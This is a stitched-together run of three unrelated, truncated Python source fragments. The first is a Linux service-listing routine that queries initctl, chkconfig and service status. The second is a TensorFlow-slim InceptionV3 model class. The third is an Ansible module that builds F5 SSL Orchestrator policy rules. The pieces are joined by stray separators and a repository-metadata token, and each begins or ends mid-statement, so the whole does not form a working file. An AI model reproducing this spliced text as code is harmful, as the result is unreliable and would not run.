if len(s[0]) == 1: #swap them.
s.reverse()
d['Name'] = s[0]
if len(sc.Name) and not fnmatch.fnmatch(d['Name'],sc.Name):
continue
if d['Name'] in names.keys():
continue
names[d['Name']] = None
d['Controller'] = sc.Controller
d['Description'] = ''
d['State'] = 'stopped'
if 'running' in s[1] or '+' in s[1]:
d['State'] = 'running'
if len(sc.State) and sc.State != d['State'].lower():
continue
d['Path'] = ''
if os.path.exists('/etc/init.d/' + s[0]):
d['Path'] = '/etc/init.d/' + s[0]
elif os.path.exists('/etc/init/' + s[0] + '.conf'):
d['Path'] = '/etc/init/' + s[0] + '.conf'
# 'initctl list' won't show disabled services
d['Enabled'] = True
if sc.FilterEnabled and sc.Enabled != d['Enabled']:
continue
if len(s[1]) > 1:
cmd = 'initctl show-config ' + d['Name'] + ' | grep -E "start |stop " | tr "\n" " " | tr -s " " '
code, out = RunGetOutputNoStderr(cmd, False, False)
d['Runlevels'] = out[1:]
else:
rld=GetRunlevels(sc,d['Name'])
if rld != None and 'Runlevels' in rld.keys():
d['Runlevels'] = rld['Runlevels']
sc.services_list.append(copy.deepcopy(d))
return True
def InitdGetAll(sc):
d={}
if helperlib.CONFIG_SYSCONFDIR_DSC == "omsconfig":
initd_service_status = 'sudo /opt/microsoft/omsconfig/Scripts/OMSServiceStat.sh'
status_postfix = ''
initd_service_status_all = 'sudo /opt/microsoft/omsconfig/Scripts/OMSServiceStatAll.sh'
else:
initd_service_status = initd_service
status_postfix = ' status'
initd_service_status_all = initd_service + ' --status-all '
if os.path.exists(initd_chkconfig):
# SLES 11-SP4 chkconfig can return error code on success,
# so don't check chkconfig error code if this is the case.
if os.path.exists('/etc/SuSE-release'):
txt = open('/etc/SuSE-release','r').read()
s=r'.*?VERSION.*?=(.*?)\n.*?PATCHLEVEL.*?=(.*?)\n'
m = re.search(s, txt, re.M)
if m != None:
if not (int(m.group(1)) == 11 and int(m.group(2)) == 4 ) :
# Does the command work?
# There may be no error detected in our multi-pipe command below.
# To keep from returning garbage, we must test the command.
# RunGetOutput(chk_err = True) will log the error message here if it occurs.
cmd = initd_chkconfig + ' --list '
code, txt = RunGetOutputNoStderr(cmd, False, True)
if code != 0:
return False
# Now we know it will work.
cmd = initd_chkconfig + ' --list | grep on | grep -v based'
code, txt = RunGetOutputNoStderr(cmd, False, False)
services=txt.splitlines()
for srv in services:
if len(srv) == 0:
continue
s=srv.split()
d['Name'] = s[0]
if len(sc.Name) and not fnmatch.fnmatch(d['Name'],sc.Name):
continue
d['Controller'] = sc.Controller
d['Description'] = ''
d['State'] = 'stopped'
cmd = initd_service_status + ' ' + s[0] + status_postfix
code, txt = RunGetOutputNoStderr(cmd, False, False)
if 'running' in txt:
d['State'] = 'running'
if len(sc.State) and sc.State != d['State'].lower():
continue
d['Path'] = ''
if os.path.exists('/etc/init.d/' + s[0]):
d['Path'] = '/etc/init.d/' + s[0]
d['Enabled'] = ':on' in srv
if sc.FilterEnabled and sc.Enabled != d['Enabled']:
continue
d['Runlevels'] = reduce(lambda x, y: x + ' ' + y, s[1:])
sc.services_list.append(copy.deepcopy(d))
else:
# Does the command work?
# There may be no error detected in our multi-statement command below.
# To keep from returning garbage, we must test the command.
# RunGetOutput(chk_err = True) will log the error message here if it occurs.
cmd = initd_service_status_all
code, txt = RunGetOutputNoStderr(cmd, False, True)
if code != 0:
return False
# Now we know it will work.
cmd = initd_service_status_all + ' &> /tmp/tmpfile ; cat /tmp/tmpfile ; rm /tmp/tmpfile'
code, txt = RunGetOutputNoStderr(cmd, False, False)
txt = txt.replace('[','')
txt = txt.replace(']','')
services = txt.splitlines()
for srv in services:
if len(srv) == 0:
continue
s=srv.split()
d['Name'] = s[1]
if len(sc.Name) and not fnmatch.fnmatch(d['Name'],sc.Name):
continue
d['Controller'] = sc.Controller
d['Description'] = ''
d['State'] = 'stopped'
if '+' in s[0]:
d['State'] = 'running'
if len(sc.State) and sc.State != d['State'].lower():
continue
d['Path'] = ''
if os.path.exists('/etc/init.d/' + s[1]):
d['Path'] = '/etc/init.d/' + s[1]
elif os.path.exists('/etc/init/' + s[1] + '.conf'):
d['Path'] = '/etc/init/' + | |
<gh_stars>0
import tensorflow as tf
from modeler.tfmodel import TFModel
class InceptionNetModel(TFModel):
def __init__(self):
self.slim = tf.contrib.slim
self.trunc_normal = lambda stddev: tf.truncated_normal_initializer(0.0, stddev)
pass
def add_placeholder(self):
batch_size = 32
height, width = 299, 299
self.inputs = tf.random_uniform((batch_size, height, width, 3))
pass
def build(self):
with self.slim.arg_scope(self.inception_v3_arg_scope()):
self.logits, self.end_points = self.inception_v3(self.inputs, is_training=False)
pass
def inception_v3_base(self,inputs, scope=None):
end_points = {}
with tf.variable_scope(scope, 'InceptionV3', [inputs]):
with self.slim.arg_scope([self.slim.conv2d, self.slim.max_pool2d, self.slim.avg_pool2d],
stride=1, padding='VALID'):
# 299 x 299 x 3
net = self.slim.conv2d(inputs, 32, [3, 3], stride=2, scope='Conv2d_1a_3x3')
# 149 x 149 x 32
net = self.slim.conv2d(net, 32, [3, 3], scope='Conv2d_2a_3x3')
# 147 x 147 x 32
net = self.slim.conv2d(net, 64, [3, 3], padding='SAME', scope='Conv2d_2b_3x3')
# 147 x 147 x 64
net = self.slim.max_pool2d(net, [3, 3], stride=2, scope='MaxPool_3a_3x3')
# 73 x 73 x 64
net = self.slim.conv2d(net, 80, [1, 1], scope='Conv2d_3b_1x1')
# 73 x 73 x 80.
net = self.slim.conv2d(net, 192, [3, 3], scope='Conv2d_4a_3x3')
# 71 x 71 x 192.
net = self.slim.max_pool2d(net, [3, 3], stride=2, scope='MaxPool_5a_3x3')
# 35 x 35 x 192.
# Inception blocks
with self.slim.arg_scope([self.slim.conv2d, self.slim.max_pool2d, self.slim.avg_pool2d],
stride=1, padding='SAME'):
# mixed: 35 x 35 x 256.
with tf.variable_scope('Mixed_5b'):
with tf.variable_scope('Branch_0'):
branch_0 = self.slim.conv2d(net, 64, [1, 1], scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = self.slim.conv2d(net, 48, [1, 1], scope='Conv2d_0a_1x1')
branch_1 = self.slim.conv2d(branch_1, 64, [5, 5], scope='Conv2d_0b_5x5')
with tf.variable_scope('Branch_2'):
branch_2 = self.slim.conv2d(net, 64, [1, 1], scope='Conv2d_0a_1x1')
branch_2 = self.slim.conv2d(branch_2, 96, [3, 3], scope='Conv2d_0b_3x3')
branch_2 = self.slim.conv2d(branch_2, 96, [3, 3], scope='Conv2d_0c_3x3')
with tf.variable_scope('Branch_3'):
branch_3 = self.slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = self.slim.conv2d(branch_3, 32, [1, 1], scope='Conv2d_0b_1x1')
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 3)
# mixed_1: 35 x 35 x 288.
with tf.variable_scope('Mixed_5c'):
with tf.variable_scope('Branch_0'):
branch_0 = self.slim.conv2d(net, 64, [1, 1], scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = self.slim.conv2d(net, 48, [1, 1], scope='Conv2d_0b_1x1')
branch_1 = self.slim.conv2d(branch_1, 64, [5, 5], scope='Conv_1_0c_5x5')
with tf.variable_scope('Branch_2'):
branch_2 = self.slim.conv2d(net, 64, [1, 1], scope='Conv2d_0a_1x1')
branch_2 = self.slim.conv2d(branch_2, 96, [3, 3], scope='Conv2d_0b_3x3')
branch_2 = self.slim.conv2d(branch_2, 96, [3, 3], scope='Conv2d_0c_3x3')
with tf.variable_scope('Branch_3'):
branch_3 = self.slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = self.slim.conv2d(branch_3, 64, [1, 1], scope='Conv2d_0b_1x1')
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 3)
# mixed_2: 35 x 35 x 288.
with tf.variable_scope('Mixed_5d'):
with tf.variable_scope('Branch_0'):
branch_0 = self.slim.conv2d(net, 64, [1, 1], scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = self.slim.conv2d(net, 48, [1, 1], scope='Conv2d_0a_1x1')
branch_1 = self.slim.conv2d(branch_1, 64, [5, 5], scope='Conv2d_0b_5x5')
with tf.variable_scope('Branch_2'):
branch_2 = self.slim.conv2d(net, 64, [1, 1], scope='Conv2d_0a_1x1')
branch_2 = self.slim.conv2d(branch_2, 96, [3, 3], scope='Conv2d_0b_3x3')
branch_2 = self.slim.conv2d(branch_2, 96, [3, 3], scope='Conv2d_0c_3x3')
with tf.variable_scope('Branch_3'):
branch_3 = self.slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = self.slim.conv2d(branch_3, 64, [1, 1], scope='Conv2d_0b_1x1')
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 3)
# mixed_3: 17 x 17 x 768.
with tf.variable_scope('Mixed_6a'):
with tf.variable_scope('Branch_0'):
branch_0 = self.slim.conv2d(net, 384, [3, 3], stride=2,
padding='VALID', scope='Conv2d_1a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = self.slim.conv2d(net, 64, [1, 1], scope='Conv2d_0a_1x1')
branch_1 = self.slim.conv2d(branch_1, 96, [3, 3], scope='Conv2d_0b_3x3')
branch_1 = self.slim.conv2d(branch_1, 96, [3, 3], stride=2,
padding='VALID', scope='Conv2d_1a_1x1')
with tf.variable_scope('Branch_2'):
branch_2 = self.slim.max_pool2d(net, [3, 3], stride=2, padding='VALID',
scope='MaxPool_1a_3x3')
net = tf.concat([branch_0, branch_1, branch_2], 3)
# mixed4: 17 x 17 x 768.
with tf.variable_scope('Mixed_6b'):
with tf.variable_scope('Branch_0'):
branch_0 = self.slim.conv2d(net, 192, [1, 1], scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = self.slim.conv2d(net, 128, [1, 1], scope='Conv2d_0a_1x1')
branch_1 = self.slim.conv2d(branch_1, 128, [1, 7], scope='Conv2d_0b_1x7')
branch_1 = self.slim.conv2d(branch_1, 192, [7, 1], scope='Conv2d_0c_7x1')
with tf.variable_scope('Branch_2'):
branch_2 = self.slim.conv2d(net, 128, [1, 1], scope='Conv2d_0a_1x1')
branch_2 = self.slim.conv2d(branch_2, 128, [7, 1], scope='Conv2d_0b_7x1')
branch_2 = self.slim.conv2d(branch_2, 128, [1, 7], scope='Conv2d_0c_1x7')
branch_2 = self.slim.conv2d(branch_2, 128, [7, 1], scope='Conv2d_0d_7x1')
branch_2 = self.slim.conv2d(branch_2, 192, [1, 7], scope='Conv2d_0e_1x7')
with tf.variable_scope('Branch_3'):
branch_3 = self.slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = self.slim.conv2d(branch_3, 192, [1, 1], scope='Conv2d_0b_1x1')
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 3)
# mixed_5: 17 x 17 x 768.
with tf.variable_scope('Mixed_6c'):
with tf.variable_scope('Branch_0'):
branch_0 = self.slim.conv2d(net, 192, [1, 1], scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = self.slim.conv2d(net, 160, [1, 1], scope='Conv2d_0a_1x1')
branch_1 = self.slim.conv2d(branch_1, 160, [1, 7], scope='Conv2d_0b_1x7')
branch_1 = self.slim.conv2d(branch_1, 192, [7, 1], scope='Conv2d_0c_7x1')
with tf.variable_scope('Branch_2'):
branch_2 = self.slim.conv2d(net, 160, [1, 1], scope='Conv2d_0a_1x1')
branch_2 = self.slim.conv2d(branch_2, 160, [7, 1], scope='Conv2d_0b_7x1')
branch_2 = self.slim.conv2d(branch_2, 160, [1, 7], scope='Conv2d_0c_1x7')
branch_2 = self.slim.conv2d(branch_2, 160, [7, 1], scope='Conv2d_0d_7x1')
branch_2 = self.slim.conv2d(branch_2, 192, [1, 7], scope='Conv2d_0e_1x7')
with tf.variable_scope('Branch_3'):
branch_3 = self.slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = self.slim.conv2d(branch_3, 192, [1, 1], scope='Conv2d_0b_1x1')
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 3)
# mixed_6: 17 x 17 x 768.
with tf.variable_scope('Mixed_6d'):
with tf.variable_scope('Branch_0'):
branch_0 = self.slim.conv2d(net, 192, [1, 1], scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = self.slim.conv2d(net, 160, [1, 1], scope='Conv2d_0a_1x1')
branch_1 = self.slim.conv2d(branch_1, 160, [1, 7], scope='Conv2d_0b_1x7')
branch_1 = self.slim.conv2d(branch_1, 192, [7, 1], scope='Conv2d_0c_7x1')
with tf.variable_scope('Branch_2'):
branch_2 = self.slim.conv2d(net, 160, [1, 1], scope='Conv2d_0a_1x1')
branch_2 = self.slim.conv2d(branch_2, 160, [7, 1], scope='Conv2d_0b_7x1')
branch_2 = self.slim.conv2d(branch_2, 160, [1, 7], scope='Conv2d_0c_1x7')
branch_2 = self.slim.conv2d(branch_2, 160, [7, 1], scope='Conv2d_0d_7x1')
branch_2 = self.slim.conv2d(branch_2, 192, [1, 7], scope='Conv2d_0e_1x7')
with tf.variable_scope('Branch_3'):
branch_3 = self.slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = self.slim.conv2d(branch_3, 192, [1, 1], scope='Conv2d_0b_1x1')
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 3)
# mixed_7: 17 x 17 x 768.
with tf.variable_scope('Mixed_6e'):
with tf.variable_scope('Branch_0'):
branch_0 = self.slim.conv2d(net, 192, [1, 1], scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = self.slim.conv2d(net, 192, [1, 1], scope='Conv2d_0a_1x1')
branch_1 = self.slim.conv2d(branch_1, 192, [1, 7], scope='Conv2d_0b_1x7')
branch_1 = self.slim.conv2d(branch_1, 192, [7, 1], scope='Conv2d_0c_7x1')
with tf.variable_scope('Branch_2'):
branch_2 = self.slim.conv2d(net, 192, [1, 1], scope='Conv2d_0a_1x1')
branch_2 = self.slim.conv2d(branch_2, 192, [7, 1], scope='Conv2d_0b_7x1')
branch_2 = self.slim.conv2d(branch_2, 192, [1, 7], scope='Conv2d_0c_1x7')
branch_2 = self.slim.conv2d(branch_2, 192, [7, 1], scope='Conv2d_0d_7x1')
branch_2 = self.slim.conv2d(branch_2, 192, [1, 7], scope='Conv2d_0e_1x7')
with tf.variable_scope('Branch_3'):
branch_3 = self.slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = self.slim.conv2d(branch_3, 192, [1, 1], scope='Conv2d_0b_1x1')
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 3)
end_points['Mixed_6e'] = net
# mixed_8: 8 x 8 x 1280.
with tf.variable_scope('Mixed_7a'):
with tf.variable_scope('Branch_0'):
branch_0 = self.slim.conv2d(net, 192, [1, 1], scope='Conv2d_0a_1x1')
branch_0 = self.slim.conv2d(branch_0, 320, [3, 3], stride=2,
padding='VALID', scope='Conv2d_1a_3x3')
with tf.variable_scope('Branch_1'):
branch_1 = self.slim.conv2d(net, 192, [1, 1], scope='Conv2d_0a_1x1')
branch_1 = self.slim.conv2d(branch_1, 192, [1, 7], scope='Conv2d_0b_1x7')
branch_1 = self.slim.conv2d(branch_1, 192, [7, 1], scope='Conv2d_0c_7x1')
branch_1 = self.slim.conv2d(branch_1, 192, [3, 3], stride=2,
padding='VALID', scope='Conv2d_1a_3x3')
with tf.variable_scope('Branch_2'):
branch_2 = self.slim.max_pool2d(net, [3, 3], stride=2, padding='VALID',
scope='MaxPool_1a_3x3')
net = tf.concat([branch_0, branch_1, branch_2], 3)
# mixed_9: 8 x 8 x 2048.
with tf.variable_scope('Mixed_7b'):
with tf.variable_scope('Branch_0'):
branch_0 = self.slim.conv2d(net, 320, [1, 1], scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = self.slim.conv2d(net, 384, [1, 1], scope='Conv2d_0a_1x1')
branch_1 = tf.concat([
self.slim.conv2d(branch_1, 384, [1, 3], scope='Conv2d_0b_1x3'),
self.slim.conv2d(branch_1, 384, [3, 1], scope='Conv2d_0b_3x1')], 3)
with tf.variable_scope('Branch_2'):
branch_2 = self.slim.conv2d(net, 448, [1, 1], scope='Conv2d_0a_1x1')
branch_2 = self.slim.conv2d(
branch_2, 384, [3, 3], scope='Conv2d_0b_3x3')
branch_2 = tf.concat([
self.slim.conv2d(branch_2, 384, [1, 3], scope='Conv2d_0c_1x3'),
self.slim.conv2d(branch_2, 384, [3, 1], scope='Conv2d_0d_3x1')], 3)
with tf.variable_scope('Branch_3'):
branch_3 = self.slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = self.slim.conv2d(
branch_3, 192, [1, 1], scope='Conv2d_0b_1x1')
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 3)
# mixed_10: 8 x 8 x 2048.
with tf.variable_scope('Mixed_7c'):
with tf.variable_scope('Branch_0'):
branch_0 = self.slim.conv2d(net, 320, [1, 1], scope='Conv2d_0a_1x1')
with tf.variable_scope('Branch_1'):
branch_1 = self.slim.conv2d(net, 384, [1, 1], scope='Conv2d_0a_1x1')
branch_1 = tf.concat([
self.slim.conv2d(branch_1, 384, [1, 3], scope='Conv2d_0b_1x3'),
self.slim.conv2d(branch_1, 384, [3, 1], scope='Conv2d_0c_3x1')], 3)
with tf.variable_scope('Branch_2'):
branch_2 = self.slim.conv2d(net, 448, [1, 1], scope='Conv2d_0a_1x1')
branch_2 = self.slim.conv2d(
branch_2, 384, [3, 3], scope='Conv2d_0b_3x3')
branch_2 = tf.concat([
self.slim.conv2d(branch_2, 384, [1, 3], scope='Conv2d_0c_1x3'),
self.slim.conv2d(branch_2, 384, [3, 1], scope='Conv2d_0d_3x1')], 3)
with tf.variable_scope('Branch_3'):
branch_3 = self.slim.avg_pool2d(net, [3, 3], scope='AvgPool_0a_3x3')
branch_3 = self.slim.conv2d(
branch_3, 192, [1, 1], scope='Conv2d_0b_1x1')
net = tf.concat([branch_0, branch_1, branch_2, branch_3], 3)
return net, end_points
def inception_v3(self,inputs,
num_classes=1000,
is_training=True,
dropout_keep_prob=0.8,
prediction_fn=tf.contrib.slim.softmax,
spatial_squeeze=True,
reuse=None,
scope='InceptionV3'):
with tf.variable_scope(scope, 'InceptionV3', [inputs, num_classes],
reuse=reuse) as scope:
with self.slim.arg_scope([self.slim.batch_norm, self.slim.dropout],
is_training=is_training):
net, end_points = self.inception_v3_base(inputs, scope=scope)
# Auxiliary Head logits
with self.slim.arg_scope([self.slim.conv2d, self.slim.max_pool2d, self.slim.avg_pool2d],
stride=1, padding='SAME'):
aux_logits = end_points['Mixed_6e']
with tf.variable_scope('AuxLogits'):
aux_logits = self.slim.avg_pool2d(
aux_logits, [5, 5], stride=3, padding='VALID',
scope='AvgPool_1a_5x5')
aux_logits = self.slim.conv2d(aux_logits, 128, [1, 1],
scope='Conv2d_1b_1x1')
# Shape of feature map before the final layer.
aux_logits = self.slim.conv2d(
aux_logits, 768, [5, 5],
weights_initializer=self.trunc_normal(0.01),
padding='VALID', scope='Conv2d_2a_5x5')
aux_logits = self.slim.conv2d(
aux_logits, num_classes, [1, 1], activation_fn=None,
normalizer_fn=None, weights_initializer=self.trunc_normal(0.001),
scope='Conv2d_2b_1x1')
if spatial_squeeze:
aux_logits = tf.squeeze(aux_logits, [1, 2], name='SpatialSqueeze')
end_points['AuxLogits'] = aux_logits
# Final pooling and prediction
with tf.variable_scope('Logits'):
net = self.slim.avg_pool2d(net, [8, 8], padding='VALID',
scope='AvgPool_1a_8x8')
# 1 x 1 x 2048
net = self.slim.dropout(net, keep_prob=dropout_keep_prob, scope='Dropout_1b')
end_points['PreLogits'] = net
# 2048
logits = self.slim.conv2d(net, num_classes, [1, 1], activation_fn=None,
normalizer_fn=None, scope='Conv2d_1c_1x1')
if spatial_squeeze:
logits | |
},
"operation":"CREATE"
}
json_rule_all_traffic = {
"name":"All Traffic",
"action":"allow",
"mode":"edit",
"actionOptions":{
"ssl":"",
"serviceChain":""
},
"isDefault":True
}
json_rule_category_lookup_all = {
"type":"Category Lookup",
"options":{
"category":[],
"url":[]
}
}
json_rule_category_lookup_connect = {
"type":"HTTP Connect Category Lookup",
"options":{
"category":[],
"url":[]
}
}
json_rule_category_lookup_sni = {
"type":"SNI Category Lookup",
"options":{
"category":[],
"url":[]
}
}
json_rule_geolocation = {
"type":"Client IP Geolocation",
"options":{
"geolocations":[],
"port":[],
"url":[]
}
}
json_rule_ip_reputation = {
"type":"Client IP Reputation",
"options":{
"category":[],
"reputation":"bad",
"url":[]
}
}
json_rule_subnet_match = {
"type":"Client IP Subnet Match",
"options":{
"subnet":[],
"url":[]
}
}
json_rule_port_match = {
"type":"Client Port Match",
"options":{
"port":[]
}
}
json_rule_L7_protocol = {
"type":"L7 Protocol Lookup",
"options":{
"protocol":[],
"url":[]
}
}
json_rule_ssl_check = {
"type":"SSL Check",
"options":{
"ssl":True,
"url":[]
}
}
json_rule_url_match = {
"type":"URL Branching",
"options":{
"url":[]
}
}
json_rule_client_vlans = {
"type":"Client VLANs",
"options":{
"vlans":[],
"url":[],
"value":[]
}
}
json_rule_server_cert_issuer_dn = {
"type":"Server Certificate (Issuer DN)",
"options":{
"value":[],
"url":[]
}
}
json_rule_server_cert_subject_dn = {
"type":"Server Certificate (Subject DN)",
"options":{
"value":[],
"url":[]
}
}
json_rule_server_cert_san = {
"type":"Server Certificate (SANs)",
"options":{
"value":[],
"url":[]
}
}
json_rule_server_name_tls_clienthello = {
"type":"Server Name (TLS ClientHello)",
"options":{
"value":[],
"url":[]
}
}
class Parameters(AnsibleF5Parameters):
api_map = {}
updatables = []
api_attributes = []
returnables = []
class ApiParameters(Parameters):
pass
class ModuleParameters(Parameters):
global print_output
@property
def name(self):
name = self._values['name']
name = "ssloP_" + name
return name
@property
def policy_type(self):
policy_type = self._values['policyType']
if policy_type is None:
return "outbound"
return policy_type
@property
def traffic_rules(self):
try:
traffic_rules = self._values['trafficRules']
if traffic_rules == None:
return None
return traffic_rules
except:
return None
@property
def default_rule_allow_block(self):
try:
default_rule_allow_block = self._values['defaultRule']['allowBlock']
if default_rule_allow_block == None:
return "allow"
return default_rule_allow_block
except:
return "allow"
@property
def default_rule_tls_intercept(self):
try:
default_rule_tls_intercept = self._values['defaultRule']['tlsIntercept']
if default_rule_tls_intercept == None:
return "bypass"
return default_rule_tls_intercept
except:
return "bypass"
@property
def default_rule_service_chain(self):
try:
default_rule_service_chain = self._values['defaultRule']['serviceChain']
if default_rule_service_chain == None:
return None
return default_rule_service_chain
except:
return None
@property
def server_cert_validation(self):
try:
server_cert_validation = self._values['serverCertValidation']
if server_cert_validation == None:
return False
return server_cert_validation
except:
return False
@property
def proxy_connect_enabled(self):
try:
proxy_connect_enabled = self._values['proxyConnect']['enabled']
if proxy_connect_enabled == None:
return False
return proxy_connect_enabled
except:
return False
@property
def proxy_connect_pool(self):
try:
proxy_connect_pool = self._values['proxyConnect']['pool']
if proxy_connect_pool == None:
return None
return proxy_connect_pool
except:
return None
@property
def mode(self):
mode = self._values['mode']
return mode
class ModuleManager(object):
global print_output
global json_template
global obj_attempts
global min_version
global max_version
def __init__(self, *args, **kwargs):
self.module = kwargs.pop('module', None)
self.client = F5RestClient(**self.module.params)
self.want = ModuleParameters(params=self.module.params)
def getSsloVersion(self):
## use this method to get the SSLO version (first two digits (x.y))
uri = "https://{0}:{1}/mgmt/shared/iapp/installed-packages".format(
self.client.provider['server'],
self.client.provider['server_port']
)
try:
resp = self.client.api.get(uri).json()
for x in resp["items"]:
if x["appName"] == "f5-iappslx-ssl-orchestrator":
tmpversion = x["release"].split(".")
version = tmpversion[0] + "." + tmpversion[1]
return float(version)
break
except:
raise F5ModuleError("SSL Orchestrator package does not appear to be installed. Aborting.")
def ssloGS_global_exists(self):
## use this method to determine if ssloGS_global exists - and if not, create it
uri = "https://{0}:{1}/mgmt/shared/iapp/blocks/".format(
self.client.provider['server'],
self.client.provider['server_port']
)
query = "?$filter=name+eq+'ssloGS_global'"
resp = self.client.api.get(uri + query)
if len(resp.json()["items"]) > 0:
## ssloGS_global exists
return True
else:
## ssloGS_global does not exist - attempt to create it (only if not in output mode)
if self.want.mode != "output":
uri = "https://{0}:{1}/mgmt/shared/iapp/blocks/".format(
self.client.provider['server'],
self.client.provider['server_port']
)
gs = json_template_gs
if self.ssloVersion >= 6.0:
## remove ssloGS_global loggingConfig key for SSLO >= 6.0
del gs["inputProperties"][1]["value"]["loggingConfig"]
## =================================
## 1.0.1 general update: modify version and previousVersion values to match target BIG-IP version
## =================================
gs["inputProperties"][0]["value"]["version"] = self.ssloVersion
gs["inputProperties"][1]["value"]["version"] = self.ssloVersion
gs["inputProperties"][1]["value"]["previousVersion"] = self.ssloVersion
resp = self.client.api.post(uri, json=gs)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if resp.status not in [200, 201, 202] or 'code' in response and response['code'] not in [200, 201, 202]:
raise F5ModuleError(resp.content)
## get operation id from last request and loop through check
self.operationId = str(response["id"])
attempts = 1
error = ""
while attempts <= obj_attempts:
uri = "https://{0}:{1}/mgmt/shared/iapp/blocks/".format(
self.client.provider['server'],
self.client.provider['server_port']
)
query = "?$filter=id+eq+'{0}'".format(self.operationId)
resp = self.client.api.get(uri + query).json()
try:
if resp["items"][0]["state"] == "BOUND":
return True
break
elif resp["items"][0]["state"] == "ERROR":
error = str(resp["items"][0]["error"])
break
except:
time.sleep(1)
attempts += 1
if error != "":
## delete attempted configuration and raise error
self.deleteOperation(self.operationId)
raise F5ModuleError("Creation error: " + self.operationId + ":" + error)
else:
raise F5ModuleError("Object " + self.want.name + " create/modify operation timeout")
return True
def deleteOperation(self, id):
## use this method to delete an operation that failed
uri = "https://{0}:{1}/mgmt/shared/iapp/blocks/{2}".format(
self.client.provider['server'],
self.client.provider['server_port'],
id
)
resp = self.client.api.delete(uri)
try:
response = resp.json()
except ValueError as ex:
raise F5ModuleError(str(ex))
if resp.status in [200, 201] or 'code' in response and response['code'] in [200, 201]:
return True
else:
return False
def update_json(self, operation):
## use this to method to create and return a modified copy of the JSON template
self.config = json_template
## get base name
self.local_name = re.sub('ssloP_', '', self.want.name)
## perform some input validation
## process general json settings for all operations
self.config["inputProperties"][0]["value"]["deploymentName"] = self.want.name
self.config["inputProperties"][0]["value"]["operationType"] = operation
self.config["inputProperties"][1]["value"]["name"] = self.want.name
self.config["inputProperties"][1]["value"]["policyConsumer"]["type"] = self.want.policy_type.capitalize()
self.config["inputProperties"][1]["value"]["policyConsumer"]["subType"] = self.want.policy_type.capitalize()
## =================================
## 1.0.1 general update: modify version and previousVersion values to match target BIG-IP version
## =================================
self.config["inputProperties"][0]["value"]["version"] = self.ssloVersion
self.config["inputProperties"][1]["value"]["version"] = self.ssloVersion
self.config["inputProperties"][1]["value"]["previousVersion"] = self.ssloVersion
## input validation: serverCertStatusCheck minimally requires SSLO 7.0
if self.ssloVersion >= 7.0:
self.config["inputProperties"][1]["value"]["serverCertStatusCheck"] = self.want.server_cert_validation
## process proxyConnect settings
if self.want.proxy_connect_enabled == True:
self.config["inputProperties"][1]["value"]["proxyConfigurations"]["isProxyChainEnabled"] = True
## input validation: if enabled, must include a pool
if self.want.proxy_connect_pool == None:
raise F5ModuleError("ProxyConnect minimally requires a pool.")
else:
self.config["inputProperties"][1]["value"]["proxyConfigurations"]["pool"]["name"] = self.want.proxy_connect_pool
## process traffic rules
if self.want.traffic_rules != None:
for rule in self.want.traffic_rules:
## input validation: must include name and conditions values
if "name" not in rule:
raise F5ModuleError("A policy rule mst minimally contain a name and condition.")
if "conditions" not in rule:
raise F5ModuleError("A policy rule mst minimally contain a name and condition.")
if rule["conditions"][0]["condition"] == "pinnersRule":
## inject the pinners rule (by itself)
ruleset = {}
ruleset["name"] = "Pinners_Rule"
ruleset["operation"] = "AND"
ruleset["mode"] = "edit"
ruleset["index"] = random.randint(1000000000000, 9999999999999)
ruleset["action"] = "allow"
ruleset["actionOptions"] = {}
ruleset["actionOptions"]["ssl"] = "bypass"
ruleset["actionOptions"]["serviceChain"] = ""
ruleset["conditions"] = []
cond = copy.deepcopy(json_rule_ssl_check)
cond["index"] = random.randint(1000000000000, 9999999999999)
ruleset["conditions"].append(cond)
cond = copy.deepcopy(json_rule_category_lookup_sni)
cond["index"] = random.randint(1000000000000, 9999999999999)
cond["options"]["category"].append("Pinners")
ruleset["conditions"].append(cond)
self.config["inputProperties"][1]["value"]["rules"].append(ruleset)
else:
## start building rule object
ruleset = {}
ruleset["name"] = rule["name"]
if "matchType" not in rule:
matchType = "OR"
else:
matchType = rule["matchType"].upper()
ruleset["operation"] = matchType
ruleset["mode"] = "edit"
ruleset["valid"] = True
ruleset["index"] = random.randint(1000000000000, 9999999999999)
if "allowBlock" not in rule:
allowBlock = "allow"
else:
allowBlock = rule["allowBlock"].lower()
ruleset["action"] = allowBlock
if "tlsIntercept" not in rule:
tlsIntercept = "bypass"
else:
tlsIntercept = rule["tlsIntercept"].lower()
ruleset["actionOptions"] = {}
ruleset["actionOptions"]["ssl"] = tlsIntercept
if "serviceChain" not in rule:
serviceChain = ""
else:
serviceChain = rule["serviceChain"]
if rule["serviceChain"] == "":
serviceChain = ""
elif not serviceChain.startswith("ssloSC_"):
serviceChain = "ssloSC_" + serviceChain
ruleset["actionOptions"]["serviceChain"] = serviceChain
ruleset["conditions"] = []
## loop through and process conditions, add to rule object
for condition in rule["conditions"]:
## =================================
## Category Lookup All
## =================================
if condition["condition"] == "categoryLookupAll":
## input validation: policy type requires a "values" key, and contents must be >= 1
if "values" not in condition:
